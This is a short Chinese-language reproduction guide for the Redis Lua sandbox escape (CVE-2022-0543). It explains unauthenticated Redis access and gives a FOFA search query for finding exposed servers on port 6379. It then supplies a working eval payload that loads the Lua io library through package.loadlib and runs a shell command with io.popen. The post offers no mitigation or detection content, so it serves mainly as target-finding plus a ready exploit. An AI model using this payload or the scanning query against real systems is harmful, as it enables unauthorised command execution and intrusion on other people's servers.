Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现
Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。–那么这也就是redis未授权访问了
Redis的默认端口是6379 可以用空间测绘搜索,也可以用nmap等端口扫描工具来扫描
fofa语法搜索:port=“6379” && protocol=“redis”
用Another Redis Desktop Manager连接上数据库之后,在控制台输入以下命令
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0